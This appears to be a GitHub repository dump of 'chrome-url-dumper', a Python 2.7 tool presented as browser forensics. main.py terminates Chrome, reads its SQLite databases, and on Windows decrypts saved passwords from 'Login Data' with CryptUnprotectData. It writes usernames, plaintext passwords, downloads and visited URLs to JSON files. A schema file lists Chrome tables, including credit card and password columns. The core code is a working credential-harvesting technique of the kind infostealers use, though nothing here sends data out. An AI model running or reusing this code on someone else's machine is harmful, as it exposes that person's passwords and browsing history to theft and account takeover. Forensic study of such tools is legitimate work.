├── .gitignore ├── README.md ├── chrome_data_frame.txt ├── main.py └── requirements.txt /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | build/ 12 | develop-eggs/ 13 | dist/ 14 | downloads/ 15 | eggs/ 16 | .eggs/ 17 | lib/ 18 | lib64/ 19 | parts/ 20 | sdist/ 21 | var/ 22 | wheels/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # PyInstaller 28 | # Usually these files are written by a python script from a template 29 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 30 | *.manifest 31 | *.spec 32 | 33 | # Installer logs 34 | pip-log.txt 35 | pip-delete-this-directory.txt 36 | 37 | # Unit test / coverage reports 38 | htmlcov/ 39 | .tox/ 40 | .coverage 41 | .coverage.* 42 | .cache 43 | nosetests.xml 44 | coverage.xml 45 | *.cover 46 | .hypothesis/ 47 | 48 | # Translations 49 | *.mo 50 | *.pot 51 | 52 | # Django stuff: 53 | *.log 54 | local_settings.py 55 | 56 | # Flask stuff: 57 | instance/ 58 | .webassets-cache 59 | 60 | # Scrapy stuff: 61 | .scrapy 62 | 63 | # Sphinx documentation 64 | docs/_build/ 65 | 66 | # PyBuilder 67 | target/ 68 | 69 | # Jupyter Notebook 70 | .ipynb_checkpoints 71 | 72 | # pyenv 73 | .python-version 74 | 75 | # celery beat schedule file 76 | celerybeat-schedule 77 | 78 | # SageMath parsed files 79 | *.sage.py 80 | 81 | # Environments 82 | .env 83 | .venv 84 | env/ 85 | venv/ 86 | ENV/ 87 | 88 | # Spyder project settings 89 | .spyderproject 90 | .spyproject 91 | 92 | # Rope project settings 93 | .ropeproject 94 | 95 | # mkdocs documentation 96 | /site 97 | 98 | # mypy 99 | .mypy_cache/ 100 | 101 | # User-specific stuff: 102 | .idea/ 103 | .idea/**/workspace.xml 104 | .idea/**/tasks.xml 105 | .idea/dictionaries 106 | 107 | # Sensitive or high-churn files: 108 | .idea/**/dataSources/ 109 | .idea/**/dataSources.ids 110 | .idea/**/dataSources.xml 111 | .idea/**/dataSources.local.xml 112 | .idea/**/sqlDataSources.xml 113 | .idea/**/dynamic.xml 114 | .idea/**/uiDesigner.xml 115 | 116 | # Gradle: 117 | .idea/**/gradle.xml 118 | .idea/**/libraries 119 | 120 | # CMake 121 | cmake-build-debug/ 122 | 123 | # Mongo Explorer plugin: 124 | .idea/**/mongoSettings.xml 125 | 126 | ## File-based project format: 127 | *.iws 128 | 129 | ## Plugin-specific files: 130 | 131 | # IntelliJ 132 | /out/ 133 | 134 | # mpeltonen/sbt-idea plugin 135 | .idea_modules/ 136 | 137 | # JIRA plugin 138 | atlassian-ide-plugin.xml 139 | 140 | # Cursive Clojure plugin 141 | .idea/replstate.xml 142 | 143 | # Crashlytics plugin (for Android Studio and IntelliJ) 144 | com_crashlytics_export_strings.xml 145 | crashlytics.properties 146 | crashlytics-build.properties 147 | fabric.properties -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # chrome-url-dumper 2 | 3 | [![Awesome](https://cdn.rawgit.com/sindresorhus/awesome/d7305f38d29fed78fa85652e3a63e154dd8e8829/media/badge.svg)](https://github.com/cugu/awesome-forensics) 4 | 5 | Accessing db's stored on machine by chrome browser and dumping urls found 6 | 7 | ## Getting Started 8 | 9 | These instructions will get you a copy of the project up and running on your local machine for development and testing purposes. See Running the tests for notes on how to deploy the project on a live system. 10 | 11 | ### Prerequisites 12 | 13 | ``` 14 | Python 2.7 15 | ``` 16 | 17 | ### Installing 18 | 19 | ``` 20 | pip install -r requirements.txt 21 | ``` 22 | 23 | Check packages 24 | 25 | 26 | Windows 27 | ``` 28 | pip list | Findstr /L "package" 29 | ``` 30 | 31 | Linux 32 | ``` 33 | pip list | grep "package" 34 | ``` 35 | 36 | ## Running the tests 37 | 38 | -k kill chrome proccess ( deeper analysis ) 39 | -d deeper analysis 40 | 41 | Windows 42 | ``` 43 | python main.py -k -d 44 | ``` 45 | 46 | Linux 47 | ``` 48 | ./main.py -k -d 49 | ``` 50 | 51 | ## Authors 52 | 53 | * **Tomer Eyzenberg** - *Initial work* - [eLoopWoo](https://github.com/eLoopWoo) 54 | 55 | -------------------------------------------------------------------------------- /chrome_data_frame.txt: -------------------------------------------------------------------------------- 1 | ('History,meta):['value', 'key'] 2 | ('History,visits):['visit_time', 'from_visit', 'segment_id', 'url', 'transition', 'visit_duration', 'id'] 3 | ('History,visit_source):['source', 'id'] 4 | ('History,keyword_search_terms):['keyword_id', 'term', 'url_id', 'lower_term'] 5 | ('History,downloads):['tab_url', 'http_method', 'total_bytes', 'interrupt_reason', 'guid', 'id', 'opened', 'site_url', 'state', 'etag', 'received_bytes', 'mime_type', 'hash', 'last_access_time', 'by_ext_id', 'start_time', 'tab_referrer_url', 'last_modified', 'by_ext_name', 'danger_type', 'original_mime_type', 'referrer', 'current_path', 'target_path', 'transient', 'end_time'] 6 | ('History,downloads_url_chains):['url', 'chain_index', 'id'] 7 | ('History,segments):['url_id', 'id', 'name'] 8 | ('History,segment_usage):['visit_count', 'time_slot', 'id', 'segment_id'] 9 | ('History,downloads_slices):['download_id', 'received_bytes', 'offset'] 10 | ('History,typed_url_sync_metadata):['storage_key', 'value'] 11 | ('History,urls):['typed_count', 'title', 'url', 'hidden', 'last_visit_time', 'visit_count', 'id'] 12 | ('History,sqlite_sequence):['name', 'seq'] 13 | 14 | ('Favicons,meta):['value', 'key'] 15 | ('Favicons,icon_mapping):['icon_id', 'id', 'page_url'] 16 | ('Favicons,favicons):['url', 'id', 'icon_type'] 17 | ('Favicons,favicon_bitmaps):['last_updated', 'last_requested', 'icon_id', 'height', 'width', 'image_data', 'id'] 18 | 19 | ('Top Sites,meta):['value', 'key'] 20 | ('Top Sites,thumbnails):['redirects', 'last_updated', 'title', 'url', 'url_rank', 'good_clipping', 'boring_score', 'last_forced', 'at_top', 'load_completed', 'thumbnail'] 21 | 22 | ('Web Data,meta):['value', 'key'] 23 | ('Web Data,autofill):['count', 'date_last_used', 'name', 'value_lower', 'value', 'date_created'] 24 | ('Web Data,credit_cards):['name_on_card', 'origin', 'expiration_year', 'date_modified', 'card_number_encrypted', 'use_count', 'expiration_month', 'use_date', 'guid', 'billing_address_id'] 25 | ('Web Data,autofill_profiles):['origin', 'city', 'date_modified', 'zipcode', 'use_count', 'state', 'company_name', 'country_code', 'language_code', 'use_date', 'dependent_locality', 'guid', 'sorting_code', 'street_address'] 26 | ('Web Data,autofill_profile_names):['last_name', 'first_name', 'guid', 'middle_name', 'full_name'] 27 | ('Web Data,autofill_profile_emails):['guid', 'email'] 28 | ('Web Data,autofill_profile_phones):['guid', 'number'] 29 | ('Web Data,autofill_profiles_trash):['guid'] 30 | ('Web Data,unmasked_credit_cards):['use_count', 'use_date', 'card_number_encrypted', 'id', 'unmask_date'] 31 | ('Web Data,server_card_metadata):['use_count', 'use_date', 'id', 'billing_address_id'] 32 | ('Web Data,server_addresses):['phone_number', 'country_code', 'language_code', 'recipient_name', 'address_4', 'postal_code', 'address_1', 'address_2', 'address_3', 'sorting_code', 'id', 'street_address', 'company_name'] 33 | ('Web Data,server_address_metadata):['use_count', 'use_date', 'id', 'has_converted'] 34 | ('Web Data,ie7_logins):['date_created', 'url_hash', 'password_value'] 35 | ('Web Data,token_service):['encrypted_token', 'service'] 36 | ('Web Data,keywords):['instant_url', 'search_terms_replacement_key', 'created_by_policy', 'prepopulate_id', 'id', 'image_url_post_params', 'input_encodings', 'sync_guid', 'new_tab_url', 'usage_count', 'instant_url_post_params', 'originating_url', 'alternate_urls', 'short_name', 'safe_for_autoreplace', 'last_modified', 'suggest_url', 'keyword', 'favicon_url', 'url', 'last_visited', 'suggest_url_post_params', 'image_url', 'date_created', 'search_url_post_params'] 37 | ('Web Data,autofill_sync_metadata):['storage_key', 'value'] 38 | ('Web Data,autofill_model_type_state):['id', 'value'] 39 | ('Web Data,masked_credit_cards):['status', 'name_on_card', 'exp_month', 'last_four', 'exp_year', 'type', 'id'] 40 | 41 | ('Shortcuts,omni_box_shortcuts):['description', 'keyword', 'last_access_time', 'url', 'text', 'number_of_hits', 'transition', 'id', 'fill_into_edit', 'description_class', 'type', 'contents_class', 'contents'] 42 | ('Shortcuts,meta):['value', 'key'] 43 | 44 | ('Login Data,meta):['value', 'key'] 45 | ('Login Data,stats):['username_value', 'dismissal_count', 'update_time', 'origin_domain'] 46 | ('Login Data,logins):['username_value', 'action_url', 'username_element', 'submit_element', 'display_name', 'icon_url', 'federation_url', 'password_type', 'generation_upload_status', 'blacklisted_by_user', 'times_used', 'preferred', 'skip_zero_click', 'signon_realm', 'scheme', 'possible_username_pairs', 'origin_url', 'password_element', 'password_value', 'form_data', 'date_created', 'date_synced'] 47 | 48 | ('Origin Bound Certs,meta):['value', 'key'] 49 | ('Origin Bound Certs,channel_id):['public_key', 'host', 'creation_time', 'private_key'] 50 | 51 | ('QuotaManager,meta):['value', 'key'] 52 | ('QuotaManager,HostQuotaTable):['host', 'type', 'quota'] 53 | ('QuotaManager,OriginInfoTable):['origin', 'last_modified_time', 'type', 'used_count', 'last_access_time'] 54 | ('QuotaManager,EvictionInfoTable):['origin', 'type', 'last_eviction_time'] 55 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import sqlite3 2 | import argparse 3 | import os 4 | 5 | import errno 6 | from pandas import read_sql_query 7 | from re import findall 8 | import psutil 9 | from difflib import SequenceMatcher 10 | import json 11 | import platform 12 | import time 13 | import logging 14 | import sys 15 | 16 | log = logging.getLogger(__name__) 17 | out_hdlr = logging.StreamHandler(sys.stdout) 18 | out_hdlr.setFormatter(logging.Formatter('%(asctime)s %(message)s')) 19 | out_hdlr.setLevel(logging.INFO) 20 | log.addHandler(out_hdlr) 21 | log.setLevel(logging.INFO) 22 | 23 | 24 | def investigate_dbs(terminate_chrome, deep): 25 | log.info('INVESTIGATE CHROME DBS') 26 | current_time = time.strftime("%H-%M-%S_%d-%m-%Y") 27 | if not os.path.exists(current_time): 28 | try: 29 | log.info('CREATING FOLDER: {}'.format(os.path.join(os.getcwd(), current_time))) 30 | os.makedirs(current_time) 31 | except OSError as exc: 32 | if exc.errno != errno.EEXIST: 33 | raise 34 | if terminate_chrome: 35 | log.info('TERMINATE CHROME') 36 | kill_process() 37 | chrome_dbs_path = get_dbs_path() 38 | log.info('DUMP DOWNLOADS') 39 | dump_downloads(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_downloads.json')) 40 | if 'C:\\' in chrome_dbs_path: 41 | log.info('DUMP USER PASS') 42 | dump_user_pass(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_user_pass.json')) 43 | log.info('DUMP USERS') 44 | dump_users(path=chrome_dbs_path, output=os.path.join(current_time, 'chrome_users.json')) 45 | 46 | if deep: 47 | log.info('GENERATE CHROME FILES') 48 | chrome_files = generate_all_files(path=chrome_dbs_path) 49 | log.info('GENERATE URLS - DEEP') 50 | urls = generate_urls(path=chrome_dbs_path, files=chrome_files) 51 | else: 52 | chrome_db_files = ['History', 'Favicons', 'Cookies', 'Top Sites', 53 | 'Visited Links', 'Web Data', 'Shortcuts', 'Last Session', 54 | 'Last Tabs', 'Network Action Predictor', 'Current Tabs', 55 | 'Preferences', 'Current Session', 'TransportSecurity', 56 | 'TransportSecurity', 'Login Data', 'Origin Bound Certs', 57 | 'Bookmarks', 'QuotaManager', 'Extension Cookies'] 58 | log.info('GENERATE URLS - NORMAL') 59 | urls = generate_urls(path=chrome_dbs_path, files=chrome_db_files) 60 | 61 | log.info('DUMP URLS') 62 | dump_urls(urls=urls, output=os.path.join(current_time, 'chrome_urls.json')) 63 | 64 | 65 | def generate_all_files(path): 66 | chrome_files = set([]) 67 | for root, dirs, files in os.walk(path): 68 | chrome_files = chrome_files.union(files) 69 | return chrome_files 70 | 71 | 72 | def dump_user_pass(path, output): 73 | with open(output, 'w') as f: 74 | data = ([], []) 75 | conn = sqlite3.connect(os.path.join(path, 'Login Data')) 76 | cursor = conn.cursor() 77 | cursor.execute( 78 | 'SELECT username_value, action_url, times_used, signon_realm, origin_url, password_element, password_value, date_created FROM logins') 79 | for result in cursor.fetchall(): 80 | import win32crypt 81 | password = win32crypt.CryptUnprotectData(result[6], None, None, None, 0)[1] 82 | if password: 83 | result = list(result) 84 | result.pop(6) 85 | result.insert(6, password) 86 | data[0].append(result) 87 | else: 88 | result = list(result) 89 | result.pop(6) 90 | data[1].append(result) 91 | f.write(json.dumps(data)) 92 | f.flush() 93 | 94 | 95 | def dump_users(path, output): 96 | with open(output, 'w') as f: 97 | conn = sqlite3.connect(os.path.join(path, 'Login Data')) 98 | cursor = conn.cursor() 99 | cursor.execute( 100 | 'SELECT username_value, update_time, origin_domain FROM stats') 101 | data = cursor.fetchall() 102 | f.write(json.dumps(data)) 103 | f.flush() 104 | 105 | 106 | def dump_downloads(path, output): 107 | with open(output, 'w') as f: 108 | db_path = os.path.join(path, 'History') 109 | conn = sqlite3.connect(db_path) 110 | cursor = conn.cursor() 111 | cursor.execute( 112 | 'SELECT tab_url, http_method, opened, site_url, last_access_time, start_time, tab_referrer_url, last_modified, by_ext_name, original_mime_type, referrer, current_path, target_path, transient FROM downloads') 113 | data = cursor.fetchall() 114 | f.write(json.dumps(data)) 115 | f.flush() 116 | 117 | 118 | def dump_urls(urls, output): 119 | with open(output, 'w') as f: 120 | for url in urls: 121 | f.write('{}\n'.format(url)) 122 | 123 | 124 | def fuzzy_search(name1, name2, strictness): 125 | similarity = SequenceMatcher(None, name1, name2) 126 | return similarity.ratio() > strictness 127 | 128 | 129 | def kill_process(): 130 | process_names = ['chrome.exe', 'chrome'] 131 | for p in psutil.process_iter(): 132 | for p_name in process_names: 133 | try: 134 | if p.name() == p_name: 135 | p.kill() 136 | except psutil.NoSuchProcess: 137 | # unknown problem 138 | log.info("PSUUTIL.NOSUCHPROCESS") 139 | continue 140 | 141 | 142 | def get_dbs_path(): 143 | path_win_10_post2008 = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default') 144 | path_win_7 = os.path.join('C:\\', 'Users', os.getenv('username'), 'AppData', 'Local', 'Google', 'Chrome', 'User Data', 'Default') 145 | path_win_xp = os.path.join('C:\\', 'Documents and Settings', os.getenv('username'), 'Application Support', 'Google', 'Chrome', 'Default') 146 | path_mac_os_x = os.path.join('/home', os.getenv('USER'), 'Library', 'Application Support', 'Google', 'Chrome', 'Default') 147 | path_linux = os.path.join('/home', os.getenv('USER'), '.config', 'google-chrome', 'Default') 148 | system_name = platform.system().upper() 149 | if 'JAVA' in system_name: 150 | return None 151 | if 'WINDOWS' in system_name: 152 | system_name += platform.release().upper() 153 | return { 154 | 'WINDOWSPOST2008SERVER': path_win_10_post2008, 155 | 'WINDOWS10': path_win_10_post2008, 156 | 'WINDOWS8.1': path_win_10_post2008, 157 | 'WINDOWS8': path_win_10_post2008, 158 | 'WINDOWS7': path_win_7, 159 | 'WINDOWSVISTA': path_win_7, 160 | 'WINDOWSXP': path_win_xp, 161 | 'MACOS': path_mac_os_x, 162 | 'LINUX': path_linux 163 | }.get(system_name, 'WINDOWS10') 164 | 165 | 166 | def generate_urls(path, files): 167 | urls = set([]) 168 | counter = 0 169 | for f in files: 170 | try: 171 | counter += 1 172 | if not (counter % (len(files) / 10)): 173 | log.info("GENERATE URLS: {}%".format((float(counter) / len(files)) * 100)) 174 | db = sqlite3.connect(os.path.join(path, f)) 175 | cursor = db.cursor() 176 | cursor.execute("SELECT name FROM sqlite_master WHERE type='table';") 177 | tables = cursor.fetchall() 178 | for table_name in tables: 179 | table_name = table_name[0] 180 | table = read_sql_query("SELECT * from %s" % table_name, db) 181 | new_urls = findall(r"(https?:\/\/)?([\da-z\.-]+)\.([a-z\.]{2,6})([\S]*)\/?", table.to_string()) 182 | urls = urls.union(new_urls) 183 | # log.info('File:{:15}Success'.format(f)) 184 | except sqlite3.DatabaseError, e: 185 | log.info('GENERATE URLS: {:30}File: {:30}Failed: {:30}'.format(str((float(counter) / len(files)) * 100) + '%', f, e)) 186 | # log.info("GENERATE URLS: {}%".format(100.0)) 187 | return urls 188 | 189 | 190 | if __name__ == '__main__': 191 | parser = argparse.ArgumentParser(description='Dump information from Google-Chrome browser databases') 192 | parser.add_argument('-k', '--kill-browser', help='terminate chrome process', required=False, 193 | dest='terminate_chrome', 194 | action='store_true') 195 | parser.add_argument('-d', '--deep', help='deep inspection', required=False, dest='deep', 196 | action='store_true') 197 | 198 | investigate_dbs(**vars(parser.parse_args())) 199 | -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | pandas==0.19.2 2 | psutil==5.2.2 3 | pypiwin32==219 4 | --------------------------------------------------------------------------------